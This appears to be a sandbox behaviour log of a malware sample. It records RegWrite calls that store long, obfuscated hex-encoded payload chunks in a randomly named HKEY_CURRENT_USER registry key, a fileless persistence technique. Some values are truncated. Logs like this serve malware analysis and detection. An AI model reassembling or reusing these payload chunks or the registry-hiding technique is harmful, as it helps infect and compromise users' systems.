                                                                              • RegWrite("HKEY_CURRENT_USER\Software\YLhjFraZZwiadZg\donn\d2","005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D097000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C5002700560037007700F6002700240047003700F60086007400C55510000200A30047003700F6008400A000D000D60057009600D600F6002700860034000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0F710000200A30047003700F6008400A000D000E600F600270094000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D077000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C500D60057009600D600F600270086003400C5D410000200A30047003700F6008400A000D00096004600C60016006700960065000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0D7000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C50096004600C6001600670096006500C5B410000200A30047003700F6008400A000D000D6005700960046009600270094000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0D7000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C500D600570096004600960027009400C5B410000200A30047003700F6008400A000D00047005600A600D6009600C60035000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0D7000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C50047005600A600D6009600C6003500C5B410000200A30047003700F6008400A000D000D60057004700960026002700F4000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0D7000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C500D60057004700960026002700F400C5B410000200A30047003700F6008400A000D000150015000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D037000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C5002700560037007700F6002700240015001500C5004700E60056003600E60056004500C5F510000200A30047003700F6008400A000D000E6001600270055000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D077000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C500E600160027005500C5001600960046005600D400A700F60034005700C59510000200A30047003700F6008400A000D0003600F60034003600F60034000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0B7000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C5002700560037007700F60027002400C5003600F60034003600F6003400C59510000200A30047003700F6008400A000D000E600F6007700F600F60034000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D2","REG_SZ") ➔ undefined
                                                                              • RegWrite("HKEY_CURRENT_USER\Software\YLhjFraZZwiadZg\donn\d3","D200020044009400020037007600F600C4000200460027001600F600260007009600C60034000200D20002F200005600470016005600270034D0000042006500440005004500640052F00000E3000700470047008600C3D0000007004700470086900000E300E200C3700000E2301000D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200A000D000A000D0D60000A000D000A000D000A000D0D00000A000D0005600B6001600E60035000200C700025100000200C7000200460027001600F600260007009600C6003491000097004700960034900000560046005700470096007600E600F600C43100005600460057004700960047001600C411000056004600F6003400970027004700E6005700F600347100005600E600F600A5005600D6009600451100005600D6001600E400E600F6009600760056002551000056004600F6003400E600F60096007600560025510000D700C600C6005700E400B7D000005600D6001600E400970027004700E6005700F6003471000046001600F600C4900000F200C600D6008700F20076002700F600E20007009600F6005600760056005600270066009700C600C600160056002700F200F200A3003700070047004700861400000200A300370037005600270046004600140002000500940002004700E600560027002700570034920000E300C600D60047008600F200C300E30097004600F6002600F200C3D10000E30097004600F6002600C300E3004600160056008600F200C300E3005600C600470096004700F200C300B600360056008600340002000500940002004700E60056002700270057003400E3005600C600470096004700C300E3004600160056008600C300E300C600D60047008600C3170000F20076002700F600E2003700E6004600E60097004600E20007009600B6003600560086003600F200F200A300070047004700865300009200B3005300030073003300E2000300E20013002500C4003400020045005400E400E2000200B3002300E200530002004500E400020037007700F6004600E600960075000200B3000300E20063000200540094003500D4000200B3005600C60026009600470016000700D600F6003600820002000300E2004300F2001600C600C6009600A700F600D4B80810004700E600560076001600D20027005600370057510000240074000200D70023006600A3000300B73100000200F2000270000024007400027010008300D2006600470057B00000D300470087005600470062D00000D30046009600F5004700160086003600F300560076001600370037005600D4004600E60056003700F2B200002400A4005400B600E6007700D400340014003700770096009700A4002700E600F40034002700E600E6B2000045003500F40005901000A000D000D200D200D7000300B700D200D200A000D000D7003300B700A000D000A000D000D7002300B7000200A3005600070097004500D2004700E60056004700E600F6003400A000D0002200D7001300B7002200D3005600D6001600E6005600C600960066000200B30022004700E6005600D60057003600F60046002200D3005600D6001600E6000200B3001600470016004600D200D6002700F60066000200A300E600F6009600470096003700F6000700370096004400D2004700E60056004700E600F6003400A000D000D7000300B700D200D27D081000D3009700270016004600E6005700F60026000200B3001600470016004600D200D6002700F6006600F200470027001600070096004700C6005700D6D310005600070097004500D2004700E60056004700E600F6003491000087301000D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D2130000E60057002700C500E600F600960037002700560067004700E60056002700270057003600C50037007700F6004600E60096007700C50047006600F6003700F600270036009600D600C500560027001600770047006600F60037B50000560087005600E2004600D60036F000002230000022000200C60056004400020062000200330002004500F2000200950002004400F2000200E400F2000200950002003400F2000200560036009600F6008600360002003400F27400002300855000009700160027004700370097003500E200160027009600670014B10000960057003400350014003500D4F000007600E60054000700D4003700D4F000004600070057005600270007D00000460056008600360037B0000027007600D60036009600C6D00000760096006600E600F60036006700161100004600D6003600670016B0000027007600D600E600970037006700161100004700160047003700370067D00000C600F6003700E600F600360067001611000023003300E6009600770086003700671100004600C60056009600860037003600D611000067002700560037007600F600C60016110000E60016009600460027007600D6003611000056003700F600C600360075D00000E60056000700F60007008700930077110000C600F600F60047007600960037F00000E6009600460046001600C600F6F00000D6001600C6003600860037005600270066310000E60096007500D6001600C60036F000009700160027004500D6001600C60036110000E600160036003700D6001600C6003611000096005700B600230033004600F600E611","REG_SZ") ➔ undefined
                                                                              • RegWrite("HKEY_CURRENT_USER\Software\YLhjFraZZwiadZg\donn\d4","8DAB0A8E599D00AADBCE293C8BED78889EDBFBFE00AADBCE249B28FEABCBAEDBFBFE009AAD5BEC3A8D5589FC009AAD982CDBFBFEB679ED009AAD08B97EA6284C7A5C009A5D1A2DF82D181D6BEC009A5DA99D8ABD987D3ACD009A5D691D4BEDDAACAADBCE009A5DA4472B5C2B5C009AECDBFBFEA4C94DDBFBFE009AEC297D3BCC9B5D986C009AEC987DDBFBFEDBFBFED2009A9CDBFBFE5A3CDAEBFEAA4C009A9CF86D3ACDCB3B1E25009A9C181DDBFBFE187D0AEC009A3CDBFBFEDBFBFEA96C25009A3CBBFDF95C389B3EBA2C009A3C987DEA3B6EDBFBFE6BEC009A3C58EC4ABCF95C3BBC008AED9AAD23DAEBFEDBFBFE008ABD685CC939DEC97D197D008ABC4B6DDBFBFEDBFBFE799D008ABCB93DA8B92E685C8BC9BE008A8CDBFBFE8BC9BE28FDC939DE008A8C4A3D3A0D75AB3D008A8C1A59683FF95CDBFBFE008A8C0AECDBFBFEF9FD9B28FE008A8CD9DD3B5CA93D18186E008A8C599D9AECA73A3C007A8DEB4C1B7DA96CA8B92E007A8DBBEDDBFBFEDBFBFE3ABD007A8D78889E0A8BCEDBFBFEDBFBFE007ACCDBFBFE181D4AACDBFBFE007ACC9AECDBFBFE9B4DDBFBFE007ACCD8A97EA4187DAA4C007A5CDBFBFEEB2CE97D393D007A5C5A3D393DDBFBFE9B4D007A5CC96CC98DDBFBFE387D007A5C79EDEA9CA96CE939AE007A5C987DF86D5BEC3B5C006A0D2A9C1BCCDBFBFEAACD006A0D284CAA4CCB3B1EDBFBFE005A3DDBFBFEDBFBFED98D69491E005A3DDBFBFEE87CBBA8BE685C005A3D04DBFBFEDBFBFEF82D005A3CDBFBFEF92D185CB4005A3C7ACCDBFBFE18186EAB3D004AEDDBFBFE4A8BBEC96CBA2C004AED7B9DFBAD987D982C004AED0B5DA7E578889E004AED9A3CDBFBFE5B9D25004AED599D2A9CB3987D004AEDA78ABC098B4EC8BD004AEDA56A0D8AED5B6D004A3D691D982CF9889EF95C004ABCDBFBFEF92DB93D6BEC004AAC8BC9BE5B9D3B5C55004A8BBEF9FDBBA8BEB989BEA8B92E004A5A2E4ABCDBFBFE986CDBFBFE004A5A2E4AAC2A2DABCBAE3ABD003ACD4B5CDAEBFE1BCC9B28FE003ACD18186EF92DA63BCC003A8D8ABDF82D08B97EB6003A8D485D5B9DA8B92EDBFBFE003A0DAB0A8E987D8A8CDBFBFE003A3CBA2CDBFBFE495C3A3C003A3C4A5A2E9AADBBFDDBFBFE003A3C181D293C799D78889E003A3CA40439ACDBFBFE002A2DABCBAE395CCB3B1E5B9D002A2D3BCCF9FDA92D36002A9CDBFBFE9AECDBFBFE389B3E002A9C29FCDBFBFE8ABCB4001AFD1AFDC86C3BCCD9DD001AFDD9DD2A9CF9889E4B6D000AECDBFBFE9B5D988DB6000AEC8AED24DBFBFE69491E000A8BCE9BED8ABDDBFBFE4B3C000A8BCE485DBBED3A0DDBFBFE000A8BCE284C5B9DDBFBFEB989BE000A8BCEA64A3D8ABDEACC00F9FDDBFBFE0B5DC94D69491E00F9FDBB5DE97DAACD28FD00F9FDBA3C19ECDBFBFEDBFBFE00F92DFBAD9BCDDBFBFEEA9C00F92D5BECF92DFAEBAE9600F92D0AEC4B6DF95C4AED00F92D239B28FEDBFBFEAAAC00F96CDBFBFE9A9C3ABDC84D00F96CDBFBFED8A97EAA4CE500F96C3B5CA5DBFBFE7A5C00F96C7A5CABCBAEB93D9AEC00F96CA99D8ABCDBFBFEEAEC00F95CABA9790FF95C3A0D00F95CB64A5A2EEA0D187D00F9889EDBFBFE4A5A2E08B97EDA2D00F9889EDBFBFE185C79EDDBFBFE00F9889E3B5CC88DDBFBFEDBFBFE00F9889E3A0DDBFBFE38594E9AAD00F9889EE97D5B6DDBFBFEBBED00E97DDBFBFE28FD792C3A0D00E97D2A9C19EC75A93D00E939AEEAECDBFBFE9B784EDBFBFE00E939AE8A8CEAECAADBCE6BDD00D9DD4BED4ABCC8BDD9DD00D9DD185CDBFBFE5B68CB3F00D98DDBFBFEAB0A8E185C89FC00D98DDBFBFEE97DDBFBFEDBFBFE00D98DBBA8BEDBFBFEDBFBFE2300D98D3ABDDBFBFEBB5DC939DE00C98D0B0A3E39AC6A0D6A0D00C98DC98DDBFBFE580D393D00C98D284CDBFBFEDBFBFE5BEC00C97DDBFBFEABABE92FDBFBFE00C97DE5DBFBFEA6A99D00C94D9B4DDBFBFE25DBFBFE00C94D68BABE3BCC799D389B3E00C94DD6D6485DA93D00C96CDBFBFEBBA8BEDBFBFEB99C00C96C5BEC8AEDF82DDBFBFE00C96C4B5C4A5A2E484A293F00C939DE293CDBFBFE9A5D3400B99C0B5D24CA09CEDBFBFE00B99C0AECEACC4A3D599D00B99CC96CD98DDBFBFE2B5C00B99C78889EDBFBFEE939AEC8BD00B989BE9A3C1A2DDBFBFE38594E00B989BE0AECD608B97E29FC00B989BE789C3ACDDBFBFEA96C00A9BD9B28FEF86D185CDBFBFE00A9BD6A0DDBFBFE0B5DA93D00A9BD792C6BDDDBFBFEDBFBFE00A99DDBFBFE89FCDBFBFE9A9C00A99D4AEDDBFBFEDBFBFE2A2D00A99DC97D987DE85CF9889E00A99DA93D6BDD691D4AED00A93DBBA8BE68CCEAEC9BED00A93DD6181D0AECF9889E00A92DDBFBFE8A8CDBFBFEAACD00A92D1B5B5E18186EC939DEC97D00A96CDBFBFEA64A5A2EEB4C00A96CC96CDBFBFEA96CDBFBFE00A96CA93D9B28FEC86CDBFBFE00A92AB82F297D49CC9B4D00A9C9491F29FC5B6D1B5B5E00A928682F2B5CDBFBFEA92D00994CDBFBFE28FDDBFBFEDBFBFE00994CDBFBFEB33BBC230079EDDAACF9FD181D187D00799DD98D3A3C39AC6A0D00799D395CDBFBFEDBFBFE8ABD00799D24DBFBFE9BCDDBFBFE00792CFBADA95CAA4CFBAD00792C4B3C9AAD187DBA2C00792CD98D8A8C4A5A2E2B5C00792CC94D79ED185C1BCC00792CA99D297DA96CC98D00792C987DAAAC098B4E38594E00792C187DDBFBFEAB0A8ED8A97E00792C24595D9AECA93D00691DDBFBFEDBFBFE3ACDBA2C00691DEAECDBFBFE18186EDBFBFE00691D4AAC580D6BEC39AC00595D1B7DDBFBFE1BCCDBFBFE00595DE939AE6A0D284C1A2D00595D364B5C8AEDF9FD00495CDBFBFEDBFBFEF95CC86C00393DDBFBFEA92D5A3C4ABC00393D9BED","REG_SZ") ➔ undefined
                                                                              • RegWrite("HKEY_CURRENT_USER\Software\YLhjFraZZwiadZg\donn\d5","46F63427563755E6F6E42756767657265644005647572696274747145646F634465647162756E65674005647572696274747144627F6779756B407C65684005647572696274747144696577400564757269627474714465647162756E656742756C69607D6F634005647572696274747144616562786451445350056475726962747471436964716473546165627864500564796277500564756C6564400564716473556C626163777F6272427F64796465400564716473556C626163777F627242756767657265644005647164735462716F6269756B447567400564716473536E69737145647167656C65644005647167656C656449756B4005647167656C65644473716369647C657D4005647167656C65644E6F6964736E65764C4C44400564716562734005647163696669647275634930353850056372756675625274735005637F607379644005637F6C63456C69664005637E6F607375625475674005637E6F607375625265675005637E6F607375625F54756760056371634C400563716243776E69647475635E6F69647163696C60707140056371624E6F69647163696C607071456C6F637E6F63400562757470716340056275747C6573447E61696271667E694F54756760056271607D6F634005627168635E65607F40056079747F5D656479600560797454756740056079745D65647943454350056079745C6F636F647F62705974796275736563500560797455657C61665005607974556C646E61684347400560797455676E6168634005607974536E656F5475637005607974536E656F5475676005607F63635E6F69647365647F62705164716440056E696863616D4C61636F6C40056E69626D6F6340056E696C456479627750056E696C4461656250056E6F40056D69645564716440056D6964546E614564716440056D616E64737F686F54756370056D616E64737F686F54756760056D616E627563757F50056D616E62756375546564707972736E656F54756370056D616E62756375546564707972736E656F54756760056D616E6F5D65647960056D616E6F556C626164737160056D616E49724375637375636F627054756740056D616E437375636F62705F54756760056D616E427563755F54756370056D616E427563755F54756760056D616E4070716F54756370056D616E4070716F54756760056D616E4C6C65764F54756760056D616E4C6C6576435F4F54756760056D616E476164597243747E656D656C6544756740056D616E456E696863616D4F54756760056D616E456C69664F54756370056D616E4F54756760056C697473577F646E6967537375636F627050056C697473577F646E69675F54756370056C6F637E6F6340056C696640056C676E616473656250056C646E61684D6F62764560797454756740056C646E616845607974556D69647E657250056C646E6168446C656966456D69647E657250056C646E6168434740056C62657F6440056C6261647863716840056C6261637F607379644940056C62616C6961667144716D627F664462716F6260796C63437940056C626169627166547E656D6E6F6279667E6544756740056B6F667E694E6967656240056B6F667E69446E654005686361634C6169647E65646562734005676E6168636875456271607D6F634005676E6162546461400567616373756D4C69616D400567616373756D4F547567600567616D694D6F627640056562764005646F63696E655F6455646F634B465005646F63696E655E6169646E654769624F5475676005646F63696E655F5475676005646F6E4C6D685005646F6D4275686079634005646F6D4E65607F4005646F6D476E69646461605005646F6D456C69664005646F6D4F5475637005646F63486371684475674005646F634B465005636E6F6E42607005636E6F6E42636005636E6164737E696005636E6164737E694475674F5475676005636E6164737E69456471656273400563616073500563616C6075625004627F67737371607F5004627F6773737160546564707972736E656F5475637004627F6773737160546564707972736E656F5475676004627F67737371605F5475637004627F67737371605F547567600462716F6269756B4F547567600462716F6260796C634E65607F400462716F6260796C6345637F6C63400462716F6260796C634F54756760046F6864756D44756762716450046F6864756D4F54756370046F6D4840046E657F6250046E696B45657C6166597274737967656250046E6560707140046E656350046E654F645461656250046C6569666F5275646165686F54627F63656270046C656966456D616E627563757F54756370046C656966456D616E627563757F54756760046C65696644627F67737371607F54756370046C65696644627F67737371607F54756760046B616B656B616B656750046965776F54756370046965776F5475676004696F577F627004696F5475637004696F5475676004656A796E6F6278636E69735004656471656273476E6965624D627F664F5D6004656471656273456D69647F5475637004656471656273456D69647F547567600465637F6073796443794F54756760046563755473716C456D69647F54756370046563755473716C456D69647F547567600465637553756D69647F547563700465637553756D69647F5475676004656B636F6C6275647E69400465676E61686344627F6773737160556D69647F547563700465676E61686344627F6773737160556D69647F547567600464614004616F6C4004616562786450046165625E65607F400461616004694478756E6F5475637004694478756E6F54756","REG_SZ") ➔ undefined
                                                                              • RegWrite("HKEY_CURRENT_USER\Software\YLhjFraZZwiadZg\donn\d6","0010000012D700100000D0B500600000314A00500000618E00400000C1840030000022970020000022070010000080F00020000002DE00100000B1580010000012D700100000D0B500300000314A00200000B1580010000080F00020000002DE0010000012D700100000D0B500200000314A0010000080F00020000002DE0010000073EB0030000013EA0020000092E100100000729B00100000D2430010000093F300100000D3820020000033E500100000F20D00200000D21B00100000D31F0010000011F00010000011F00010000011F00010000011F00010000011F00010000011F00010000011F00010000011F00010000011F00010000011F00010000011F00010000011F00010000011F00010000011F00010000011F00010000011F00010000011F00010000011F00010000011F00010000082FA00100000D21E0020000003B900100000928B00200000338300100000B2C000100000A2A000100000A3AB0010000020A200200000002400100000C38200100000B2BC00200000631400100000B3DD0010000011B10010000011B10010000011B10010000011B10010000003B000200101A2C900100000E29200100000D2820010000010EB00200000040900100000639E00100000634A0010000003E80010000023630010000043C70020000073B100100000F3530010000053F800100000611B00700000E39400600000E2400050000083D700400000826F0030000092630020000053510010000013A800200000C3C100100000F31800100000436900100000D3AA00200000B2100010000020DF00200000A3690010000031080010000092D400100000F2E300200000F3F000100000634100300020531C00200000A38800100000621B00300000230E0020000010BD00100000A29C00100000E38B00500000A2C300400000828200300000A26100200000F2A40010000011CC00100000118C0030000060D500200000322C0010000012D50020000060520010000043E300A00000733000900000B2C80080000013AB0070000092A200600000F3C500500000A3340040000040C600300000921100200000F35B00100000C28B00A00000C25F0090000040BB00800000F2DF00700000D2100060000073E000500000334F0040000063B20030000033EC0020000013F30010000073A600100000737400900000036700800000B2810070000092A500600000A2B60050000040F500400020E2A60030020063CD0020000082C100100000237000500000044100400000535500300000639500200200F37A00100000032200600000738D00500000531200400000C2160030000023B500200200E3180010000031C800200000B25D00100000D3580040000023E40030020063E70020020013F00010002052B20030000081450020000090360010000012D70020000052B200100000D0B500500000314A0040000052B20030000081450020000090360010000080F00020000002DE0010000080AE0010000041780010000052B20030000081450020000090360010000031270010000031270010000031270010000031270010000041A70010000052B20040000081450030000090360020000041A70010000060C10040000070FF00300000D0F40020000041A700100000012E0020000052B20010000011C900200000A1790010000012D700100000D0B500400000314A0030000011C900200000A1790010000080F00020000002DE00100000F2B100200000828600100000230800200101824700100000135C0010000072080010000073770020000072990010000004D90020000083660010000004C50010000093870070000053E200600000C3B500500000C34000400220F38600300000E20D00200000F39F00100000F3F400100000F2060020000040ED0010000092F800400000D2A500300000330000200000B31800100000924000300000936800200000F2480010000082F70010000033220020000013BF00100000B34C00200000A31D00100000C3FB00100000C30800100000735E00100000D38D00200000035400100000337E00200000404500100000A3B200200000F2C90010000083AC0020000040A400100000438C00200000D3FF0010000072C00020000033710010000083F600300000E28F00200000A2F200100000E3370040000004FB00300000738A0020000023CB00100000E27A00400000721300300000D3F000200000B2BF00100000E2DE00400000F22F0030000063C800200000921F00100000E24B00400000407C00300000C2AE00200000B3760010000093330020000040B900100000C3660030000010AA00200210F2620010021062AD0010000033C000300000537A00200200720B00100000035E00100000836300100000316700100000D36300400000D2D800300000237C0020000083FB00100000047700100000734B00100000B3A300100000A2940010000041F700100000D29900100000108C0010000003C200100000A35F00100000801D00100000801D00100000915A00100000915A00100000801D00100000808C0010000010C43045933E006100000010F1C410B4406162A9021100080000000010A440F943EE021100080000000010A440B96011021100080000000010944061F32C021100080000000010844069A23802110008000000001074401973C902110008000000001064209D20CD80600000000042411064007943B180600000000042A01054209D132D8060000000004210105400797205806000000000327F1044209DF25580600000000032EE1044007982F4806000000000324E104400A0C141816000000000128F10144048907C306400300000","REG_SZ") ➔ undefined
                                                                              • RegWrite("HKEY_CURRENT_USER\Software\YLhjFraZZwiadZg\donn\d7","71D8C0DB00E0713E520500A0D111F17A00A051E1129F00E0616281ED00A0C1AE50E700606162C1A000A0616281BB00A0C1AEE1AD00606162211A00A06162A09300A0E10E51BA0021713E811A00A0C1BC81B600A0C1BCF09A00A06162F0BC00A06162E06F00A0616201E200A06162D0EC00A0D111019700A0C175D0F700A0C175E07600A0C175E06300A0D111D01E00A06162D08B00A050DDF01700607111E0A000E050DDE0ED0060C1AEE06C0060C175F0C300A051E1D06900E051E1E02800E0A1CFE0F100E0E10E6108002121B3F03200A0713EF04500A0C1BCD0CF00A0C1BCE0B900A0713EF08000A0713E013100A0713EF0AF00A0713E012400A0713EF0C800A0713EE0FA00A00000D1C80037C175E03500A0D11101B500A0D111F0AD00A06162616900A0502C005E00A06162C0F200A0110D229A00A06162A00000A0E10E029700216162316900A06162120700A06162D0D300A06162E1B700A052FFF16B00E0D1EE713300E0D1EED02100A032C6A1B700A0E10EB1410021C175F1DF00E071D8C02B00E0712A913400A0D125A15A00A06162C0D500A0F166A0C000A0C11AB19200606162023F00A0C157B1F50060C11AC0B9006000000000001011340000000000200000007000000070000000D1000000100000008000000010000000400000000200000031000000700000002000000065000000F2000000C000000020000000100000005600000030000000B00000007E00000070000010D800000020000010B4000010870000007A000000E20000006C00000010000061003352AF000000F190F36BFB75100000200000000000000026F6C62432000051020000CDC60000004494557432000000010000CDC5003555320000C58D0000F748000000003776E696274735320000048D0000E3CA0000E7320000E304000000C60050000000009313330333E203E24367000000C0000000000010001024A435240000004B0544140544140500000000000000000000002047563556362757F637562556D69647E65725E23756362757F6375625E2D656473797353293830356433393136353365316737326D3E656B6F6459756B43696C626570502C2C61627475756E6D356275747C6573402C203E203E203E243D3E6F6963727566502C22696C627F63637D602C227564616562556362757F6375625E23756362757F6375625E2D65647379735C60000001900000010EBFEACEC0000004B000010D1000000C000001013000010C100000010000000100000C11400A26000A00000358260C280A7A00000858208A00033026CEDA000004382100000544711EFF510EF6180F530EF617030EF41100000545702EDFFFFFF490000000000000020547010B2713003EFF170C090A3EDFFFFFF9AFFFFFF1AFFFFFF89FFFFFF69FFFFFF49FFFFFF98FFFFFFD7FFFFFF86FFFFFFC5FFFFFF84FFFFFFD3FFFFFF83FFFFFF63FFFFFF12FFFFFFC1FFFFFFA0FFFFFF10000000000000002154C06185718000000099DD00B2A04011D001F1626000105782D0F0F1000000006260001077829011D0C0F14031A00010D8829011D0B0F181C2A011A031A000107182A0001070E79011D0A0F1903160001067825011D090F1B3C280118031A000107182A0001070E75011D0E150316000102782D0F1D0D1403141D0C117B220C27011703110EF616000104782A0001070E7D0A1000000888350C26011603110EF616000103782D0F1D081B0EFF100A00000358200001100005600001035003003B1000000A26000B2A0600010A6F640302080C02000007247A000109882A00000D282200000720D70B060001045820700C56B27400000C9E70011000046000000530040033100000000C1006C8B00E0002010000054F0005B7A00E000000000C110000000A26000B2A04100CD000000A0001081827080C290119031A000107182A0001070E77000C1ED32EDA000003582A04100A000004382F0ED00000073EDA0A00000A7F68011A00000A88200A0001044824000000AB74011618011400000F9B74011803110000065D86D71AD714000000AB7401183C27011703130EF614000000AB74011A4C26011603110EF61600010A58261402150214000000AD796E8905021400000F9D7705021400000E9D76150212000008251EF50212000008251EF402100A00010618296E890706190B0A00010518296E890D0A0000039822000C0A00010C83720B0A0001070E700110000360000009E004003B10000A26000B2A060001026F620B2000070820700C54A27400000C9E700A00010B8F6400000C9E7400000D9E7400000C9086000103582A0000094820700C50927511100A00010B8F66000103582A0000094820700C567275111400000D9E7005131411150C292119231A000005D82411121B2005131311170C282118231A000005D82311162B2005131211170C272117231A000005D822111A3B2005131111170C262116231A000005D821111E4B2005131011170C252115231A000005D82011126B2005131F01170C242114231A000005D82F01167B2005131E01170C232113231A000005D82E011000000A883005131D011A0C222112231A000005D82D0110000001A83005131B011A0C212111231A000005D82B0110000008B83005131C011A0C202110231A000005D82C011000000FC83005131A011A0C2F111F131A000005D82A0110000006E830051319011A0C2E111E131A000005D829011000000DF830051318011A0C2D111D131A000005D82801100001041830051317011A0C2C111C131A000005D827011000010B2830051316011A0C2B111B131A000005D82601100001024830051315011A0C2A111A131A000005D82501100","REG_SZ") ➔ undefined
                                                                              • RegWrite("HKEY_CURRENT_USER\Software\YLhjFraZZwiadZg\donn\d8","F151C2D011D03120EF61C011D0F0F1C031A000002FF60700E1EA27A9B0115011D0E0F12AA000109782A9B0115011B0115011D0D0F10000008A83B03161A031AD7196E85011D0C0F15031A000004FF6D9C2F16152100000C9D871A000003FF66D71A000002FF6070045592740000088B7200000F1F84011400000B7B72040000088B7200000F1F84011400000B7B720D0B0F10000108383A061D0A0F1A0C29011903110EF514011D090F1BB136011701170316D717011D0E1000001B240317011D0B190C28011803110EF61A0001087F6A0000026F630A0000026F640000058B7200000F1F87011400000B7B720D0A1F3B2703161603196E8400000B7B720D091403151D081B0EFF100A000003582000011000095000020F7005003B1000090E3000000C000009025000090D300000010000000100000C114A26000A00000358260C280A7A00000858208A00033026CEDA000004382100000544711EFF510EF6180F530EF617030EF41100000545702EDFFFFEF8A0000000000000020547010B2713003EFF170C090A3EDFFFFEFDBFFFFEF6BFFFFEF5BFFFFEF96FFFFEFA5FFFFEFF1FFFFDFCEFFFFDF0EFFFFDF9AFFFFDF19FFFFDFB8FFFFDF97FFFFDF76FFFFDFF4FFFFDFE4FFFFCF5FFFFFCF1FFFFFCF0FFFFFCF29FFFFCFE8FFFFCFD8FFFFCFF2FFFFCFC0FFFFCF60FFFFBF8AFFFFBF58FFFFBFF7FFFFBF12FFFFBF00FFFFAFDDFFFFAFEBFFFFAFBAFFFFAF5AFFFFAF08FFFFAFD6FFFFAF46FFFFAF35FFFFAF25FFFFAFA2FFFFAF62FFFFAF52FFFF9F1FFFFF9FDEFFFF9F9BFFFF9FC9FFFF9FD7FFFF9F26FFFF9F55FFFF9FC4FFFF9F23FFFFAFE6FFFF9FD2FFFF9F72FFFF9F00FFFF8F0FFFFF8F9EFFFF8FBDFFFF8F8AFFFF8FA5FFFF8F12FFFF8F11FFFF8F30FFFF7FAFFFFF7FBDFFFF7FAAFFFF7FB9FFFF7FA9FFFF7F88FFFF7F48FFFF7F95FFFF7FD4FFFF7FC3FFFF7F73FFFF7F10FFFF6F9EFFFF6F0E00000000000000D454C06185718000001058DD00B2A071D0B4F100626000109182A000102782A000105782A00010073740000097B720A00010D682A00010C6E7A0001086376000107182A1A00010B682A00010A682A000109637A6E1A000108637302020D094F138132211321132316D713211D084F1626000109182A000102782A000105782A00010073740000097B720A00010D682A00010C6E7A0001086376000107182A1487DE61211302020D074F1123178600010718281A00010B682A00010A682A0001007378D813211A00010A682A000109637A6C0F1A0001086373020D064F177B232316122310211D054F10231A00010E682A00010D682A00010C6E7A000108637600010718281A00010B682A00010A682A000109637A691A0001086373020D044F1000010D093F111F13110EFB119483040000087B720D034F1000010528300FFFFAFF1E3A011B011B0316D71B011D014F1FFFFDF54E38111911191316D719111D004F131317B6D400000F7B7200000D1F891110111A63111D0F3F1002AA00010778260001071827B400000F7B7200000D1F891110111A00010B682A00010A682A0001007373111A00010A682A000109637F011A000108637701120911140000028B7200000E1F86DB0116011400000D7B720D0D3F100B5B200002AA0001037F67B400000F7B7200000D1F891110111A00010B682A00010A682A0001007373111A00010A682A000109637F011A000108637701140000087B720A00000BE82911140000028B7200000E1F86DB0116011400000D7B720D0A3F10006B200002AA0001037F67B400000F7B7200000D1F891110111A00010B682A00010A682A0001007373111A00010A682A000109637F011A000108637701140000087B720A000104782911140000028B7200000E1F86DB0116011400000D7B720D073F1F5C2E111E13110EF61A000101782A000109637A691A000108637400000A7B720D063F10000002883002AA0001037F67B400000F7B7200000D1F891110111A00010B682A00010A682A0001007373111A00010A682A000109637F011A000108637701140000087B720A000002B82911140000028B7200000E1F86DB0116011400000D7B720D043F146C2D111D13110EF61A000101782A000109637A681A000108637400000A7B720D033F10000109083002AA0001037F67B400000F7B7200000D1F891110111A00010B682A00010A682A0001007373111A00010A682A000109637F011A000108637701140000087B720A00000BE82911140000028B7200000E1F86DB0116011400000D7B720D013F146C2C111C13110EF61A000101782A00010C6E7A000108637400000A7B720D003F10000101993B111B13110EF61600010618240000008B7200000D1F89111011120D0F2F10000207193A111A13120EFA690F140000008B7200000D1F891110111D0E2F10000202B839131618131AD7196E80111D0D2F1313161D0C2F140000028D710000004D86D71AD7196E80111200000E1F86DB0116011400000D7B720D0B2F1FFFFEF2BA37111713140EFF0111111D0A1F10021316D712111D092F111316DA6716DA6ADC011E0111111D082F100400000F7D7E6197B40000008B7200000D1F821110111400000C7B720200000D1F821110111D062F100A2